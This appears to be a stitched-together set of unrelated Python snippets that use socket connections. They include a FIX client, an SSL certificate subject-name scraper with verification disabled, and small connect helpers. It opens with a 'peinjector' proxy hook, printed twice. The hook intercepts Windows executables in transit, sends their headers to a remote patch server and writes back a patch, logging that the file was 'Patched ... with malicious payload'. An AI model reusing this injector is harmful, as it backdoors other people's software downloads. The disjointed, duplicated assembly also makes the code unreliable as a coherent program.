def modify(chunks):
# Maximum PE Header size to expect
# Maximum Patch size to expect
# Connection Timeout
# Access Token
max_header, max_patch, connection_timeout, access_token = config
header = True
patcher = None
position = 0
for content in chunks:
# Only do this for 1. chunk, and quick PE check
if header and (content[:2] == 'MZ'):
print("[+] Intercept PE, send header to server ({} bytes)".
format(len(content)))
# If something goes wrong while network transmission
try:
# Open socket
patch_socket = socket.create_connection(
patch_address, connection_timeout)
# Send patch to server
if (patch_socket is not None) and patch_socket.send(
access_token + content[:max_header]):
# Receive patch from Server
patch_mem = patch_socket.recv(max_patch)
# Close socket
patch_socket.close()
print("[+] Received patch: {} bytes".format(
len(patch_mem)))
patcher = PePatch(patch_mem)
if patcher.patch_ok():
print("[+] Patch parsed successfully")
else:
print("[-] Error parsing patch")
patcher = None
except Exception:
patcher = None
# Check only 1. chunk for header
header = False
# Apply Patch
if patcher is not None:
content = patcher.apply_patch(content, position)
position += len(content)
yield content
if patcher is not None:
print "[peinjector] Patched '{}' with malicious payload".format(
flow.request.url.split("/")[-1])
def modify(chunks):
# Maximum PE Header size to expect
# Maximum Patch size to expect
# Connection Timeout
# Access Token
max_header, max_patch, connection_timeout, access_token = config
header = True
patcher = None
position = 0
for content in chunks:
# Only do this for 1. chunk, and quick PE check
if header and (content[:2] == 'MZ'):
print("[+] Intercept PE, send header to server ({} bytes)".format(len(content)))
# If something goes wrong while network transmission
try:
# Open socket
patch_socket = socket.create_connection(patch_address, connection_timeout)
# Send patch to server
if (patch_socket is not None) and patch_socket.send(access_token + content[:max_header]):
# Receive patch from Server
patch_mem = patch_socket.recv(max_patch)
# Close socket
patch_socket.close()
print("[+] Received patch: {} bytes".format(len(patch_mem)))
patcher = PePatch(patch_mem)
if patcher.patch_ok():
print("[+] Patch parsed successfully")
else:
print("[-] Error parsing patch")
patcher = None
except Exception:
patcher = None
# Check only 1. chunk for header
header = False
# Apply Patch
if patcher is not None:
content = patcher.apply_patch(content, position)
position += len(content)
yield content
if patcher is not None:
print "[peinjector] Patched '{}' with malicious payload".format(flow.request.url.split("/")[-1])
def run(self) -> None:
parsed_url = urlparse(self._url)
with ExitStack() as stack:
sock = stack.enter_context(
socket.create_connection(
(parsed_url.hostname, parsed_url.port)))
if 'ssl' in parsed_url.scheme or 'tls' in parsed_url.scheme:
context = ssl.create_default_context()
sock = stack.enter_context(
context.wrap_socket(sock,
server_hostname=parsed_url.hostname))
conn: FixConnection = stack.enter_context(
closing(FixConnection(sock, self._client_id, self._target_id)))
self._conn = conn
self._connected.set()
for msg in conn.messages:
print(msg)
logger.info('Disconnected')
def certrip(host, port):
host = host.rstrip()
context = ssl.create_default_context()
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
try:
with socket.create_connection((host, port), timeout=0.3) as sock:
with context.wrap_socket(sock, server_hostname=host) as ssock:
pem_data = ssl.DER_cert_to_PEM_cert(ssock.getpeercert(True))
cert = x509.load_pem_x509_certificate(str.encode(pem_data),
default_backend())
san = cert.extensions.get_extension_for_oid(
x509.oid.ExtensionOID.SUBJECT_ALTERNATIVE_NAME)
dns_names = []
for dns_name in san.value:
dns_names.append(dns_name.value)
sock.close()
return dns_names
except ssl.SSLError:
# sys.exit()
pass
except socket.timeout:
# sys.exit()
pass
except TimeoutError:
# sys.exit()
pass
except socket.gaierror:
# sys.exit()
pass
except ConnectionRefusedError:
# sys.exit()
pass
except cryptography.x509.extensions.ExtensionNotFound:
pass
except OSError:
# sys.exit()
pass
def connect_to_tcpserver(addr):
sock = socket.create_connection(addr)
return sock
def connect_to_tcpserver(addr):
sock = socket.create_connection(addr)
return sock
#!/usr/bin/env python3
import sys
from socket import socket
from cryptography import x509
from cryptography.hazmat.backends import default_backend
import socket
import ssl
host = sys.argv[1]
port = 443
context = ssl.create_default_context()
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
try:
with socket.create_connection((host, port)) as sock:
sock.settimeout(0.5)
with context.wrap_socket(sock, server_hostname=host) as ssock:
pem_data = ssl.DER_cert_to_PEM_cert(ssock.getpeercert(True))
cert = x509.load_pem_x509_certificate(str.encode(pem_data),
default_backend())
san = cert.extensions.get_extension_for_oid(
x509.oid.ExtensionOID.SUBJECT_ALTERNATIVE_NAME)
for dns_name in san.value:
print(dns_name.value)
except ssl.SSLError:
pass
except socket.timeout:
pass